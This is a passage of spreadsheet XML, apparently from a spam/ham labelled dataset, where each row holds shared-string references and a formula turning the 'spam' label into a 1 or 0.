    <row r="2283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2283" t="s">
        <v>7487</v>
      </c>
      <c r="B2283" t="s">
        <v>5294</v>
      </c>
      <c r="C2283" s="1">
        <f>IF(B2283="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2284" t="s">
        <v>7488</v>
      </c>
      <c r="B2284" t="s">
        <v>5294</v>
      </c>
      <c r="C2284" s="1">
        <f>IF(B2284="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2285" t="s">
        <v>7489</v>
      </c>
      <c r="B2285" t="s">
        <v>5294</v>
      </c>
      <c r="C2285" s="1">
        <f>IF(B2285="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2286" t="s">
        <v>7490</v>
      </c>
      <c r="B2286" t="s">
        <v>5294</v>
      </c>
      <c r="C2286" s="1">
        <f>IF(B2286="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2287" t="s">
        <v>7491</v>
      </c>
      <c r="B2287" t="s">
        <v>5294</v>
      </c>
      <c r="C2287" s="1">
        <f>IF(B2287="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2288" t="s">
        <v>7492</v>
      </c>
      <c r="B2288" t="s">
        <v>5294</v>
      </c>
      <c r="C2288" s="1">
        <f>IF(B2288="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2289" t="s">
        <v>7493</v>
      </c>
      <c r="B2289" t="s">
        <v>5294</v>
      </c>
      <c r="C2289" s="1">
        <f>IF(B2289="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2290" t="s">
        <v>7494</v>
      </c>
      <c r="B2290" t="s">
        <v>5294</v>
      </c>
      <c r="C2290" s="1">
        <f>IF(B2290="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2291" t="s">
        <v>7495</v>
      </c>
      <c r="B2291" t="s">
        <v>5297</v>
      </c>
      <c r="C2291" s="1">
        <f>IF(B2291="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2292" t="s">
        <v>7496</v>
      </c>
      <c r="B2292" t="s">
        <v>5294</v>
      </c>
      <c r="C2292" s="1">
        <f>IF(B2292="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2293" t="s">
        <v>7497</v>
      </c>
      <c r="B2293" t="s">
        <v>5294</v>
      </c>
      <c r="C2293" s="1">
        <f>IF(B2293="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2294" t="s">
        <v>7498</v>
      </c>
      <c r="B2294" t="s">
        <v>5294</v>
      </c>
      <c r="C2294" s="1">
        <f>IF(B2294="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2295" t="s">
        <v>7499</v>
      </c>
      <c r="B2295" t="s">
        <v>5294</v>
      </c>
      <c r="C2295" s="1">
        <f>IF(B2295="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2296" t="s">
        <v>7500</v>
      </c>
      <c r="B2296" t="s">
        <v>5297</v>
      </c>
      <c r="C2296" s="1">
        <f>IF(B2296="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2297" t="s">
        <v>7501</v>
      </c>
      <c r="B2297" t="s">
        <v>5294</v>
      </c>
      <c r="C2297" s="1">
        <f>IF(B2297="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2298" t="s">
        <v>7502</v>
      </c>
      <c r="B2298" t="s">
        <v>5297</v>
      </c>
      <c r="C2298" s="1">
        <f>IF(B2298="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2299" t="s">
        <v>7503</v>
      </c>
      <c r="B2299" t="s">
        <v>5294</v>
      </c>
      <c r="C2299" s="1">
        <f>IF(B2299="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2300" t="s">
        <v>7504</v>
      </c>
      <c r="B2300" t="s">
        <v>5294</v>
      </c>
      <c r="C2300" s="1">
        <f>IF(B2300="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2301" t="s">
        <v>5779</v>
      </c>
      <c r="B2301" t="s">
        <v>5297</v>
      </c>
      <c r="C2301" s="1">
        <f>IF(B2301="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2302" t="s">
        <v>7505</v>
      </c>
      <c r="B2302" t="s">
        <v>5294</v>
      </c>
      <c r="C2302" s="1">
        <f>IF(B2302="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2303" t="s">
        <v>7506</v>
      </c>
      <c r="B2303" t="s">
        <v>5294</v>
      </c>
      <c r="C2303" s="1">
        <f>IF(B2303="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2304" t="s">
        <v>7507</v>
      </c>
      <c r="B2304" t="s">
        <v>5294</v>
      </c>
      <c r="C2304" s="1">
        <f>IF(B2304="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2305" t="s">
        <v>7508</v>
      </c>
      <c r="B2305" t="s">
        <v>5294</v>
      </c>
      <c r="C2305" s="1">
        <f>IF(B2305="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2306" t="s">
        <v>7509</v>
      </c>
      <c r="B2306" t="s">
        <v>5294</v>
      </c>
      <c r="C2306" s="1">
        <f>IF(B2306="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2307" t="s">
        <v>7510</v>
      </c>
      <c r="B2307" t="s">
        <v>5294</v>
      </c>
      <c r="C2307" s="1">
        <f>IF(B2307="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2308" t="s">
        <v>7511</v>
      </c>
      <c r="B2308" t="s">
        <v>5294</v>
      </c>
      <c r="C2308" s="1">
        <f>IF(B2308="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2309" t="s">
        <v>6467</v>
      </c>
      <c r="B2309" t="s">
        <v>5297</v>
      </c>
      <c r="C2309" s="1">
        <f>IF(B2309="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2310" t="s">
        <v>7512</v>
      </c>
      <c r="B2310" t="s">
        <v>5297</v>
      </c>
      <c r="C2310" s="1">
        <f>IF(B2310="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2311" t="s">
        <v>7513</v>
      </c>
      <c r="B2311" t="s">
        <v>5294</v>
      </c>
      <c r="C2311" s="1">
        <f>IF(B2311="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2312" t="s">
        <v>7514</v>
      </c>
      <c r="B2312" t="s">
        <v>5297</v>
      </c>
      <c r="C2312" s="1">
        <f>IF(B2312="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2313" t="s">
        <v>7515</v>
      </c>
      <c r="B2313" t="s">
        <v>5297</v>
      </c>
      <c r="C2313" s="1">
        <f>IF(B2313="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2314" t="s">
        <v>7516</v>
      </c>
      <c r="B2314" t="s">
        <v>5297</v>
      </c>
      <c r="C2314" s="1">
        <f>IF(B2314="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2315" t="s">
        <v>7517</v>
      </c>
      <c r="B2315" t="s">
        <v>5294</v>
      </c>
      <c r="C2315" s="1">
        <f>IF(B2315="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2316" t="s">
        <v>7518</v>
      </c>
      <c r="B2316" t="s">
        <v>5294</v>
      </c>
      <c r="C2316" s="1">
        <f>IF(B2316="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2317" t="s">
        <v>7519</v>
      </c>
      <c r="B2317" t="s">
        <v>5294</v>
      </c>
      <c r="C2317" s="1">
        <f>IF(B2317="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2318" t="s">
        <v>7520</v>
      </c>
      <c r="B2318" t="s">
        <v>5294</v>
      </c>
      <c r="C2318" s="1">
        <f>IF(B2318="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2319" t="s">
        <v>7521</v>
      </c>
      <c r="B2319" t="s">
        <v>5294</v>
      </c>
      <c r="C2319" s="1">
        <f>IF(B2319="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2320" t="s">
        <v>7522</v>
      </c>
      <c r="B2320" t="s">
        <v>5294</v>
      </c>
      <c r="C2320" s="1">
        <f>IF(B2320="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2321" t="s">
        <v>7523</v>
      </c>
      <c r="B2321" t="s">
        <v>5294</v>
      </c>
      <c r="C2321" s="1">
        <f>IF(B2321="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2322" t="s">
        <v>7524</v>
      </c>
      <c r="B2322" t="s">
        <v>5294</v>
      </c>
      <c r="C2322" s="1">
        <f>IF(B2322="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2323" t="s">
        <v>6531</v>
      </c>
      <c r="B2323" t="s">
        <v>5294</v>
      </c>
      <c r="C2323" s="1">
        <f>IF(B2323="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2324" t="s">
        <v>7525</v>
      </c>
      <c r="B2324" t="s">
        <v>5294</v>
      </c>
      <c r="C2324" s="1">
        <f>IF(B2324="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2325" t="s">
        <v>7526</v>
      </c>
      <c r="B2325" t="s">
        <v>5294</v>
      </c>
      <c r="C2325" s="1">
        <f>IF(B2325="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2326" t="s">
        <v>7527</v>
      </c>
      <c r="B2326" t="s">
        <v>5294</v>
      </c>
      <c r="C2326" s="1">
        <f>IF(B2326="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2327" t="s">
        <v>7528</v>
      </c>
      <c r="B2327" t="s">
        <v>5294</v>
      </c>
      <c r="C2327" s="1">
        <f>IF(B2327="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2328" t="s">
        <v>6267</v>
      </c>
      <c r="B2328" t="s">
        <v>5294</v>
      </c>
      <c r="C2328" s="1">
        <f>IF(B2328="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2329" t="s">
        <v>7529</v>
      </c>
      <c r="B2329" t="s">
        <v>5297</v>
      </c>
      <c r="C2329" s="1">
        <f>IF(B2329="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2330" t="s">
        <v>7530</v>
      </c>
      <c r="B2330" t="s">
        <v>5294</v>
      </c>
      <c r="C2330" s="1">
        <f>IF(B2330="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2331" t="s">
        <v>7531</v>
      </c>
      <c r="B2331" t="s">
        <v>5294</v>
      </c>
      <c r="C2331" s="1">
        <f>IF(B2331="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2332" t="s">
        <v>7532</v>
      </c>
      <c r="B2332" t="s">
        <v>5294</v>
      </c>
      <c r="C2332" s="1">
        <f>IF(B2332="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2333" t="s">
        <v>7533</v>
      </c>
      <c r="B2333" t="s">
        <v>5294</v>
      </c>
      <c r="C2333" s="1">
        <f>IF(B2333="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2334" t="s">
        <v>7534</v>
      </c>
      <c r="B2334" t="s">
        <v>5294</v>
      </c>
      <c r="C2334" s="1">
        <f>IF(B2334="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2335" t="s">
        <v>7535</v>
      </c>
      <c r="B2335" t="s">
        <v>5294</v>
      </c>
      <c r="C2335" s="1">
        <f>IF(B2335="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2336" t="s">
        <v>7536</v>
      </c>
      <c r="B2336" t="s">
        <v>5294</v>
      </c>
      <c r="C2336" s="1">
        <f>IF(B2336="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2337" t="s">
        <v>7537</v>
      </c>
      <c r="B2337" t="s">
        <v>5294</v>
      </c>
      <c r="C2337" s="1">
        <f>IF(B2337="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2338" t="s">
        <v>7538</v>
      </c>
      <c r="B2338" t="s">
        <v>5294</v>
      </c>
      <c r="C2338" s="1">
        <f>IF(B2338="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2339" t="s">
        <v>7539</v>
      </c>
      <c r="B2339" t="s">
        <v>5294</v>
      </c>
      <c r="C2339" s="1">
        <f>IF(B2339="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2340" t="s">
        <v>7540</v>
      </c>
      <c r="B2340" t="s">
        <v>5294</v>
      </c>
      <c r="C2340" s="1">
        <f>IF(B2340="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2341" t="s">
        <v>7541</v>
      </c>
      <c r="B2341" t="s">
        <v>5294</v>
      </c>
      <c r="C2341" s="1">
        <f>IF(B2341="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2342" t="s">
        <v>7542</v>
      </c>
      <c r="B2342" t="s">
        <v>5294</v>
      </c>
      <c r="C2342" s="1">
        <f>IF(B2342="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2343" t="s">
        <v>7543</v>
      </c>
      <c r="B2343" t="s">
        <v>5294</v>
      </c>
      <c r="C2343" s="1">
        <f>IF(B2343="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2344" t="s">
        <v>7544</v>
      </c>
      <c r="B2344" t="s">
        <v>5297</v>
      </c>
      <c r="C2344" s="1">
        <f>IF(B2344="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2345" t="s">
        <v>6628</v>
      </c>
      <c r="B2345" t="s">
        <v>5294</v>
      </c>
      <c r="C2345" s="1">
        <f>IF(B2345="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2346" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2346" t="s">
        <v>5575</v>
      </c>
      <c r="B2346" t="s">
        <v>5294</v>
      </c>
      <c r="C2346" s="1">
        <f>IF(B2346="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2347" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2347" t="s">
        <v>7545</v>
      </c>
      <c r="B2347" t="s">
        <v>5294</v>
      </c>
      <c r="C2347" s="1">
        <f>IF(B2347="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2348" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2348" t="s">
        <v>7546</v>
      </c>
      <c r="B2348" t="s">
        <v>5294</v>
      </c>
      <c r="C2348" s="1">
        <f>IF(B2348="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2349" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2349" t="s">
        <v>7547</v>
      </c>
      <c r="B2349" t="s">
        <v>5294</v>
      </c>
      <c r="C2349" s="1">
        <f>IF(B2349="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2350" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2350" t="s">
        <v>7548</v>
      </c>
      <c r="B2350" t="s">
        <v>5294</v>
      </c>
      <c r="C2350" s="1">
        <f>IF(B2350="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2351" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2351" t="s">
        <v>7549</v>
      </c>
      <c r="B2351" t="s">
        <v>5294</v>
      </c>
      <c r="C2351" s="1">
        <f>IF(B2351="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2352" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2352" t="s">
        <v>5379</v>
      </c>
      <c r="B2352" t="s">
        <v>5294</v>
      </c>
      <c r="C2352" s="1">
        <f>IF(B2352="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2353" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2353" t="s">
        <v>7550</v>
      </c>
      <c r="B2353" t="s">
        <v>5297</v>
      </c>
      <c r="C2353" s="1">
        <f>IF(B2353="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2354" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2354" t="s">
        <v>7551</v>
      </c>
      <c r="B2354" t="s">
        <v>5294</v>
      </c>
      <c r="C2354" s="1">
        <f>IF(B2354="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2355" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2355" t="s">
        <v>7552</v>
      </c>
      <c r="B2355" t="s">
        <v>5297</v>
      </c>
      <c r="C2355" s="1">
        <f>IF(B2355="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2356" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2356" t="s">
        <v>7553</v>
      </c>
      <c r="B2356" t="s">
        <v>5294</v>
      </c>
      <c r="C2356" s="1">
        <f>IF(B2356="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2357" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2357" t="s">
        <v>7554</v>
      </c>
      <c r="B2357" t="s">
        <v>5294</v>
      </c>
      <c r="C2357" s="1">
        <f>IF(B2357="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2358" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2358" t="s">
        <v>7555</v>
      </c>
      <c r="B2358" t="s">
        <v>5294</v>
      </c>
      <c r="C2358" s="1">
        <f>IF(B2358="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2359" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2359" t="s">
        <v>7556</v>
      </c>
      <c r="B2359" t="s">
        <v>5294</v>
      </c>
      <c r="C2359" s="1">
        <f>IF(B2359="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2360" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2360" t="s">
        <v>7557</v>
      </c>
      <c r="B2360" t="s">
        <v>5294</v>
      </c>
      <c r="C2360" s="1">
        <f>IF(B2360="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2361" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2361" t="s">
        <v>7558</v>
      </c>
      <c r="B2361" t="s">
        <v>5297</v>
      </c>
      <c r="C2361" s="1">
        <f>IF(B2361="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2362" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2362" t="s">
        <v>7559</v>
      </c>
      <c r="B2362" t="s">
        <v>5294</v>
      </c>
      <c r="C2362" s="1">
        <f>IF(B2362="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2363" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2363" t="s">
        <v>7560</v>
      </c>
      <c r="B2363" t="s">
        <v>5294</v>
      </c>
      <c r="C2363" s="1">
        <f>IF(B2363="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2364" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2364" t="s">
        <v>5488</v>
      </c>
      <c r="B2364" t="s">
        <v>5294</v>
      </c>
      <c r="C2364" s="1">
        <f>IF(B2364="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2365" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2365" t="s">
        <v>7561</v>
      </c>
      <c r="B2365" t="s">
        <v>5297</v>
      </c>
      <c r="C2365" s="1">
        <f>IF(B2365="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2366" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2366" t="s">
        <v>7562</v>
      </c>
      <c r="B2366" t="s">
        <v>5294</v>
      </c>
      <c r="C2366" s="1">
        <f>IF(B2366="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2367" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2367" t="s">
        <v>7563</v>
      </c>
      <c r="B2367" t="s">
        <v>5294</v>
      </c>
      <c r="C2367" s="1">
        <f>IF(B2367="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2368" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2368" t="s">
        <v>7564</v>
      </c>
      <c r="B2368" t="s">
        <v>5297</v>
      </c>
      <c r="C2368" s="1">
        <f>IF(B2368="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2369" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2369" t="s">
        <v>7565</v>
      </c>
      <c r="B2369" t="s">
        <v>5294</v>
      </c>
      <c r="C2369" s="1">
        <f>IF(B2369="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2370" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2370" t="s">
        <v>7566</v>
      </c>
      <c r="B2370" t="s">
        <v>5294</v>
      </c>
      <c r="C2370" s="1">
        <f>IF(B2370="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2371" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2371" t="s">
        <v>7567</v>
      </c>
      <c r="B2371" t="s">
        <v>5294</v>
      </c>
      <c r="C2371" s="1">
        <f>IF(B2371="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2372" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2372" t="s">
        <v>7568</v>
      </c>
      <c r="B2372" t="s">
        <v>5294</v>
      </c>
      <c r="C2372" s="1">
        <f>IF(B2372="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2373" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2373" t="s">
        <v>7569</v>
      </c>
      <c r="B2373" t="s">
        <v>5294</v>
      </c>
      <c r="C2373" s="1">
        <f>IF(B2373="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2374" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2374" t="s">
        <v>7570</v>
      </c>
      <c r="B2374" t="s">
        <v>5294</v>
      </c>
      <c r="C2374" s="1">
        <f>IF(B2374="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2375" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2375" t="s">
        <v>7571</v>
      </c>
      <c r="B2375" t="s">
        <v>5297</v>
      </c>
      <c r="C2375" s="1">
        <f>IF(B2375="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2376" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2376" t="s">
        <v>7572</v>
      </c>
      <c r="B2376" t="s">
        <v>5294</v>
      </c>
      <c r="C2376" s="1">
        <f>IF(B2376="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2377" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2377" t="s">
        <v>7573</v>
      </c>
      <c r="B2377" t="s">
        <v>5294</v>
      </c>
      <c r="C2377" s="1">
        <f>IF(B2377="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2378" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2378" t="s">
        <v>7574</v>
      </c>
      <c r="B2378" t="s">
        <v>5294</v>
      </c>
      <c r="C2378" s="1">
        <f>IF(B2378="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2379" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2379" t="s">
        <v>7575</v>
      </c>
      <c r="B2379" t="s">
        <v>5297</v>
      </c>
      <c r="C2379" s="1">
        <f>IF(B2379="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2380" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2380" t="s">
        <v>7576</v>
      </c>
      <c r="B2380" t="s">
        <v>5294</v>
      </c>
      <c r="C2380" s="1">
        <f>IF(B2380="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2381" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2381" t="s">
        <v>7577</v>
      </c>
      <c r="B2381" t="s">
        <v>5294</v>
      </c>
      <c r="C2381" s="1">
        <f>IF(B2381="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2382" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2382" t="s">
        <v>7578</v>
      </c>
      <c r="B2382" t="s">
        <v>5294</v>
      </c>
      <c r="C2382" s="1">
        <f>IF(B2382="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2383" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2383" t="s">
        <v>7579</v>
      </c>
      <c r="B2383" t="s">
        <v>5294</v>
      </c>
      <c r="C2383" s="1">
        <f>IF(B2383="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2384" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2384" t="s">
        <v>7580</v>
      </c>
      <c r="B2384" t="s">
        <v>5294</v>
      </c>
      <c r="C2384" s="1">
        <f>IF(B2384="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2385" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2385" t="s">
        <v>7581</v>
      </c>
      <c r="B2385" t="s">
        <v>5294</v>
      </c>
      <c r="C2385" s="1">
        <f>IF(B2385="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2386" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2386" t="s">
        <v>5376</v>
      </c>
      <c r="B2386" t="s">
        <v>5294</v>
      </c>
      <c r="C2386" s="1">
        <f>IF(B2386="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
